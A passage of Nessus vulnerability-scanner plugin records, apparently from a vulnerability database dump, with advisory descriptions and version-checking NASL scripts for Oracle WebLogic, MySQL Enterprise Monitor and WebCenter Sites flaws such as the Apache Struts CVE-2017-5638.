or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"Oracle WebLogic Server\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix = NULL;\nfix_ver = NULL;\n\n# individual security patches\nif (version =~ \"^10\\.3\\.6\\.\")\n{\n fix_ver = \"10.3.6.0.171017\";\n fix = \"26519424\";\n}\nelse if (version =~ \"^12\\.1\\.3\\.\")\n{\n fix_ver = \"12.1.3.0.171017\";\n fix = \"26519417\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.1($|[^0-9])\")\n{\n fix_ver = \"12.2.1.1.171017\";\n fix = \"26519400\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.2($|[^0-9])\")\n{\n fix_ver = \"12.2.1.2.171017\";\n fix = \"26485996\";\n}\n\nif (!isnull(fix_ver) && ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if ('windows' >< tolower(os))\n {\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n }\n else port = 0;\n\n report =\n '\\n Oracle home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version +\n '\\n Required Patch : ' + fix +\n '\\n';\n security_report_v4(extra:report, port:port, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-28T15:10:03", "description": "According to its self-reported version, the MySQL Enterprise Monitor application running on the remote host is 3.1.x prior to 3.1.7.8023, 3.2.x prior to 3.2.7.1204, or 3.3.x prior to 3.3.3.1199. 
It is, therefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists in the Apache Commons component in the FileUpload functionality due to improper handling of file upload requests. An unauthenticated, remote attacker can exploit this, via a specially crafted content-type header, to cause a denial of service condition. Note that this vulnerability does not affect MySQL Enterprise Monitor versions 3.3.x.\n (CVE-2016-3092)\n\n - An unspecified flaw exists in the Apache Struts component that is triggered during the cleanup of action names. An unauthenticated, remote attacker can exploit this, via a specially crafted payload, to perform unspecified actions. (CVE-2016-4436)\n\n - A carry propagation error exists in the OpenSSL component in the Broadwell-specific Montgomery multiplication procedure when handling input lengths divisible by but longer than 256 bits. This can result in transient authentication and key negotiation failures or reproducible erroneous outcomes of public-key operations with specially crafted input. A man-in-the-middle attacker can possibly exploit this issue to compromise ECDH key negotiations that utilize Brainpool P-512 curves. (CVE-2016-7055)\n\n - An unspecified flaw exists in the Monitoring Server subcomponent that allows an authenticated, remote attacker to impact confidentiality and integrity.\n (CVE-2017-3306)\n\n - An unspecified flaw exists in the Monitoring Server subcomponent that allows an authenticated, remote attacker to impact integrity and availability.\n (CVE-2017-3307)\n\n - An out-of-bounds read error exists in the OpenSSL component when handling packets using the CHACHA20/POLY1305 or RC4-MD5 ciphers. An unauthenticated, remote attacker can exploit this, via specially crafted truncated packets, to cause a denial of service condition. 
(CVE-2017-3731)\n\n - A carry propagating error exists in the OpenSSL component in the x86_64 Montgomery squaring implementation that may cause the BN_mod_exp() function to produce incorrect results. An unauthenticated, remote attacker with sufficient resources can exploit this to obtain sensitive information regarding private keys.\n (CVE-2017-3732)\n\n - A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers.\n An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638)", "cvss3": {}, "published": "2017-04-21T00:00:00", "type": "nessus", "title": "MySQL Enterprise Monitor 3.1.x < 3.1.7.8023 / 3.2.x < 3.2.7.1204 / 3.3.x < 3.3.3.1199 Multiple Vulnerabilities (April 2017 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-3092", "CVE-2016-4436", "CVE-2016-7055", "CVE-2017-3306", "CVE-2017-3307", "CVE-2017-3731", "CVE-2017-3732", "CVE-2017-5638"], "modified": "2021-11-30T00:00:00", "cpe": ["cpe:/a:oracle:mysql_enterprise_monitor"], "id": "MYSQL_ENTERPRISE_MONITOR_3_3_3_1199.NASL", "href": "https://www.tenable.com/plugins/nessus/99593", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(99593);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/11/30\");\n\n script_cve_id(\n \"CVE-2016-3092\",\n \"CVE-2016-4436\",\n \"CVE-2016-7055\",\n \"CVE-2017-3306\",\n \"CVE-2017-3307\",\n \"CVE-2017-3731\",\n \"CVE-2017-3732\",\n \"CVE-2017-5638\"\n );\n script_bugtraq_id(\n 91280,\n 91453,\n 94242,\n 95813,\n 95814,\n 96729,\n 97724,\n 97844\n );\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n 
script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"MySQL Enterprise Monitor 3.1.x < 3.1.7.8023 / 3.2.x < 3.2.7.1204 / 3.3.x < 3.3.3.1199 Multiple Vulnerabilities (April 2017 CPU)\");\n script_summary(english:\"Checks the version of MySQL Enterprise Monitor.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by multiple\nvulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the MySQL Enterprise Monitor\napplication running on the remote host is 3.1.x prior to 3.1.7.8023,\n3.2.x prior to 3.2.7.1204, or 3.3.x prior to 3.3.3.1199. It is,\ntherefore, affected by multiple vulnerabilities :\n\n - A denial of service vulnerability exists in the Apache\n Commons component in the FileUpload functionality due to\n improper handling of file upload requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted content-type header, to cause a denial\n of service condition. Note that this vulnerability does\n not affect MySQL Enterprise Monitor versions 3.3.x.\n (CVE-2016-3092)\n\n - An unspecified flaw exists in the Apache Struts\n component that is triggered during the cleanup of action\n names. An unauthenticated, remote attacker can exploit\n this, via a specially crafted payload, to perform\n unspecified actions. (CVE-2016-4436)\n\n - A carry propagation error exists in the OpenSSL\n component in the Broadwell-specific Montgomery\n multiplication procedure when handling input lengths\n divisible by but longer than 256 bits. This can result\n in transient authentication and key negotiation failures\n or reproducible erroneous outcomes of public-key\n operations with specially crafted input. A\n man-in-the-middle attacker can possibly exploit this\n issue to compromise ECDH key negotiations that utilize\n Brainpool P-512 curves. 
(CVE-2016-7055)\n\n - An unspecified flaw exists in the Monitoring Server\n subcomponent that allows an authenticated, remote\n attacker to impact confidentiality and integrity.\n (CVE-2017-3306)\n\n - An unspecified flaw exists in the Monitoring Server\n subcomponent that allows an authenticated, remote\n attacker to impact integrity and availability.\n (CVE-2017-3307)\n\n - An out-of-bounds read error exists in the OpenSSL\n component when handling packets using the\n CHACHA20/POLY1305 or RC4-MD5 ciphers. An\n unauthenticated, remote attacker can exploit this, via\n specially crafted truncated packets, to cause a denial\n of service condition. (CVE-2017-3731)\n\n - A carry propagating error exists in the OpenSSL\n component in the x86_64 Montgomery squaring\n implementation that may cause the BN_mod_exp() function\n to produce incorrect results. An unauthenticated, remote\n attacker with sufficient resources can exploit this to\n obtain sensitive information regarding private keys.\n (CVE-2017-3732)\n\n - A remote code execution vulnerability exists in the\n Apache Struts component in the Jakarta Multipart parser\n due to improper handling of the Content-Type,\n Content-Disposition, and Content-Length headers.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted header value in the HTTP\n request, to execute arbitrary code. 
(CVE-2017-5638)\");\n # https://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d679be85\");\n # http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html#AppendixMSQL\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?50229a1a\");\n # https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3681811.xml\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?eb4db3c7\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.oracle.com/rs?type=doc&id=2244179.1\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.oracle.com/rs?type=doc&id=2279658.1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html\");\n # https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?77e9c654\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to MySQL Enterprise Monitor version 3.1.7.8023 / 3.2.7.1204 /\n3.3.3.1199 or later as referenced in the April 2017 Oracle Critical\nPatch Update advisory.\n\nNote that the 3.2.x version was fixed for the CVE-2016-4436\nvulnerability in version 3.2.6.1182.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n 
script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/06/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/04/21\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql_enterprise_monitor\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 18443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:18443);\n\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nfixes = {\"^3.3\": \"3.3.3.1199\",\n \"^3.2\": \"3.2.7.1204\",\n \"^3.1\": \"3.1.7.8023\"};\n\nvuln = FALSE;\nfix = '';\nforeach (prefix in keys(fixes))\n{\n if (version =~ prefix && ver_compare(ver:version,\n fix:fixes[prefix],\n strict:FALSE) < 0)\n { \n vuln = TRUE;\n fix = fixes[prefix];\n break;\n }\n}\n\nif (vuln)\n{\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-28T15:21:10", "description": "The version of Oracle WebLogic Server installed on the remote host is affected by multiple vulnerabilities :\n\n - A flaw exists in Jython due to executable classes being created with insecure permissions. A local attacker can exploit this to bypass intended access restrictions and thereby disclose sensitive information or gain elevated privileges. 
(CVE-2013-2027)\n\n - A remote code execution vulnerability exists in the Apache Struts component in the Jakarta Multipart parser due to improper handling of the Content-Type, Content-Disposition, and Content-Length headers.\n An unauthenticated, remote attacker can exploit this, via a specially crafted header value in the HTTP request, to execute arbitrary code. (CVE-2017-5638)\n\n - An unspecified flaw exists in the Web Services component that allows an unauthenticated, remote attacker to have an impact on integrity and availability.\n (CVE-2017-10063)\n\n - An unspecified flaw exists in the Web Container component that allows an authenticated, remote attacker to disclose sensitive information. (CVE-2017-10123)\n\n - An unspecified flaw exists in the JNDI component that allows an unauthenticated, remote attacker to execute arbitrary code. (CVE-2017-10137)\n\n - An unspecified flaw exists in the Core Components that allows an unauthenticated, remote attacker to cause a denial of service condition. (CVE-2017-10147)\n\n - An unspecified flaw exists in the Core Components that allows an unauthenticated, remote attacker to have an impact on integrity. (CVE-2017-10148)\n\n - An unspecified flaw exists in the Web Container component that allows an unauthenticated, remote attacker to have an impact on confidentiality and integrity. 
(CVE-2017-10178)", "cvss3": {}, "published": "2017-07-19T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Multiple Vulnerabilities (July 2017 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2027", "CVE-2017-10063", "CVE-2017-10123", "CVE-2017-10137", "CVE-2017-10147", "CVE-2017-10148", "CVE-2017-10178", "CVE-2017-5638"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CPU_JUL_2017.NASL", "href": "https://www.tenable.com/plugins/nessus/101815", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101815);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2013-2027\",\n \"CVE-2017-5638\",\n \"CVE-2017-10063\",\n \"CVE-2017-10123\",\n \"CVE-2017-10137\",\n \"CVE-2017-10147\",\n \"CVE-2017-10148\",\n \"CVE-2017-10178\"\n );\n script_bugtraq_id(\n 78027,\n 96729,\n 99634,\n 99644,\n 99650,\n 99651,\n 99652,\n 99653\n );\n script_xref(name:\"CERT\", value:\"834067\");\n script_xref(name:\"EDB-ID\", value:\"41570\");\n script_xref(name:\"EDB-ID\", value:\"41614\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Oracle WebLogic Server Multiple Vulnerabilities (July 2017 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application server installed on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebLogic Server installed on the remote host is\naffected by multiple vulnerabilities :\n\n - A flaw exists in Jython due to executable classes being\n created with insecure permissions. 
A local attacker can\n exploit this to bypass intended access restrictions and\n thereby disclose sensitive information or gain elevated\n privileges. (CVE-2013-2027)\n\n - A remote code execution vulnerability exists in the\n Apache Struts component in the Jakarta Multipart parser\n due to improper handling of the Content-Type,\n Content-Disposition, and Content-Length headers.\n An unauthenticated, remote attacker can exploit this,\n via a specially crafted header value in the HTTP\n request, to execute arbitrary code. (CVE-2017-5638)\n\n - An unspecified flaw exists in the Web Services component\n that allows an unauthenticated, remote attacker to have\n an impact on integrity and availability.\n (CVE-2017-10063)\n\n - An unspecified flaw exists in the Web Container\n component that allows an authenticated, remote attacker\n to disclose sensitive information. (CVE-2017-10123)\n\n - An unspecified flaw exists in the JNDI component that\n allows an unauthenticated, remote attacker to execute\n arbitrary code. (CVE-2017-10137)\n\n - An unspecified flaw exists in the Core Components that\n allows an unauthenticated, remote attacker to cause a\n denial of service condition. (CVE-2017-10147)\n\n - An unspecified flaw exists in the Core Components that\n allows an unauthenticated, remote attacker to have an\n impact on integrity. (CVE-2017-10148)\n\n - An unspecified flaw exists in the Web Container\n component that allows an unauthenticated, remote\n attacker to have an impact on confidentiality and\n integrity. 
(CVE-2017-10178)\");\n # http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?76f5def7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the July 2017 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/19\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_set_attribute(attribute:\"thorough_tests\", 
value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_weblogic_server_installed.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"installed_sw/Oracle WebLogic Server\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"Oracle WebLogic Server\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix = NULL;\nfix_ver = NULL;\n\n# individual security patches\nif (version =~ \"^10\\.3\\.6\\.\")\n{\n fix_ver = \"10.3.6.0.170718\";\n fix = \"25869650\";\n}\nelse if (version =~ \"^12\\.1\\.3\\.\")\n{\n fix_ver = \"12.1.3.0.170718\";\n fix = \"25869659\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.1($|[^0-9])\")\n{\n fix_ver = \"12.2.1.1.170718\";\n fix = \"25961827\";\n}\nelse if (version =~ \"^12\\.2\\.1\\.2($|[^0-9])\")\n{\n fix_ver = \"12.2.1.2.170718\";\n fix = \"25871788\";\n}\n\nif (!isnull(fix_ver) && ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)\n{\n os = get_kb_item_or_exit(\"Host/OS\");\n if ('windows' >< tolower(os))\n {\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n }\n else port = 0;\n\n report =\n '\\n Oracle home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version +\n '\\n Required patch : ' + fix +\n '\\n';\n security_report_v4(extra:report, port:port, severity:SECURITY_HOLE);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-26T15:24:56", "description": "The version of Oracle WebLogic Server installed on the remote host is affected by multiple Apache 
Struts 2 vulnerabilities. One of the following vulnerabilities was detected on the asset:\n\n - CVE-2017-5638: The Jakarta Multipart parser in Apache Struts 2, specifically 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1\n - CVE-2017-7672: Apache Struts version < 2.5.12\n - CVE-2017-9787: Apache Struts version < 2.5.12 or < 2.3.33\n - CVE-2017-9791: Struts 1 plugin in Apache Struts 2.3.x\n - CVE-2017-9793: Apache Struts < 2.3.7 - 2.3.33 & < 2.5 - 2.5.12\n - CVE-2017-9804: Apache Struts 2.3.7 -2.3.33 & 2.5 - 2.5.12\n - CVE-2017-12611: Apache Struts 2.0.1 - 2.3.33 & 2.5 - 2.5.10", "cvss3": {}, "published": "2017-10-04T00:00:00", "type": "nessus", "title": "Oracle WebLogic Server Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12611", "CVE-2017-5638", "CVE-2017-7672", "CVE-2017-9787", "CVE-2017-9791", "CVE-2017-9793", "CVE-2017-9804", "CVE-2017-9805"], "modified": "2023-09-25T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware", "cpe:/a:oracle:weblogic_server"], "id": "ORACLE_WEBLOGIC_SERVER_CVE-2017-9805.NBIN", "href": "https://www.tenable.com/plugins/nessus/103663", "sourceData": "Binary data oracle_weblogic_server_CVE-2017-9805.nbin", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-28T15:51:29", "description": "Oracle WebCenter Sites component of Oracle Fusion Middleware is vulnerable to multiple vulnerabilities.\n\n - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent:\n Install (Apache Common Collections)). An unauthenticated, remote attacker can exploit this, via a crafted serialized Java object, to bypass authentication and execute arbitrary commands. (CVE-2015-7501)\n\n - An unspecified vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Server). 
An unauthenticated, remote attacker can exploit this, via HTTP, to obtain access to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized update, insert or delete access to some of Oracle WebCenter Sites accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle WebCenter Sites. (CVE-2017-3542)\n\n - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent:\n Third Party Tools (Struts 2)) due to incorrect exception handling and error-message generation during file-upload attempts. An unauthenticated, remote attacker can exploit this, via a crafted Content-Type, Content-Disposition, or Content-Length HTTP header, to bypass authentication and execute arbitrary commands. (CVE-2017-5638)\n\nIn addition, Oracle WebCenter Sites is also affected by several additional vulnerabilities including code execution, denial of service, information disclosure, and other unspecified vulnerabilities. 
Note that Nessus has not attempted to exploit these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2020-06-01T00:00:00", "type": "nessus", "title": "Oracle WebCenter Sites Multiple Vulnerabilities (April 2017 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501", "CVE-2016-0714", "CVE-2017-3540", "CVE-2017-3541", "CVE-2017-3542", "CVE-2017-3543", "CVE-2017-3545", "CVE-2017-3554", "CVE-2017-3591", "CVE-2017-3593", "CVE-2017-3594", "CVE-2017-3595", "CVE-2017-3596", "CVE-2017-3597", "CVE-2017-3598", "CVE-2017-3602", "CVE-2017-3603", "CVE-2017-5638"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:fusion_middleware"], "id": "ORACLE_WEBCENTER_SITES_APR_2017_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/136998", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136998);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2015-7501\",\n \"CVE-2016-0714\",\n \"CVE-2017-3540\",\n \"CVE-2017-3541\",\n \"CVE-2017-3542\",\n \"CVE-2017-3543\",\n \"CVE-2017-3545\",\n \"CVE-2017-3554\",\n \"CVE-2017-3591\",\n \"CVE-2017-3593\",\n \"CVE-2017-3594\",\n \"CVE-2017-3595\",\n \"CVE-2017-3596\",\n \"CVE-2017-3597\",\n \"CVE-2017-3598\",\n \"CVE-2017-3602\",\n \"CVE-2017-3603\",\n \"CVE-2017-5638\"\n );\n script_xref(name:\"IAVA\", value:\"2017-A-0113-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Oracle WebCenter Sites Multiple Vulnerabilities (April 2017 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application running on the remote host is affected by multiple security vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"Oracle WebCenter Sites 
component of Oracle Fusion Middleware is vulnerable to multiple vulnerabilities.\n\n - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent:\n Install (Apache Common Collections)). An unauthenticated, remote attacker can exploit this, via a crafted\n serialized Java object, to bypass authentication and execute arbitrary commands. (CVE-2015-7501)\n\n - An unspecified vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware\n (subcomponent: Server). An unauthenticated, remote attacker can exploit this, via HTTP, to obtain access\n to critical data or complete access to all Oracle WebCenter Sites accessible data as well as unauthorized\n update, insert or delete access to some of Oracle WebCenter Sites accessible data and unauthorized ability\n to cause a partial denial of service (partial DOS) of Oracle WebCenter Sites. (CVE-2017-3542)\n\n - A remote code execution in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent:\n Third Party Tools (Struts 2)) due to incorrect exception handling and error-message generation during\n file-upload attempts. An unauthenticated, remote attacker can exploit this, via a crafted Content-Type,\n Content-Disposition, or Content-Length HTTP header, to bypass authentication and execute arbitrary\n commands. (CVE-2017-5638)\n\nIn addition, Oracle WebCenter Sites is also affected by several additional vulnerabilities including code execution,\ndenial of service, information disclosure, and other unspecified vulnerabilities. 
Note that Nessus has not attempted to\nexploit these issues but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpuapr2017.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2017 Oracle Critical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-5638\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Jakarta Multipart Parser OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n 
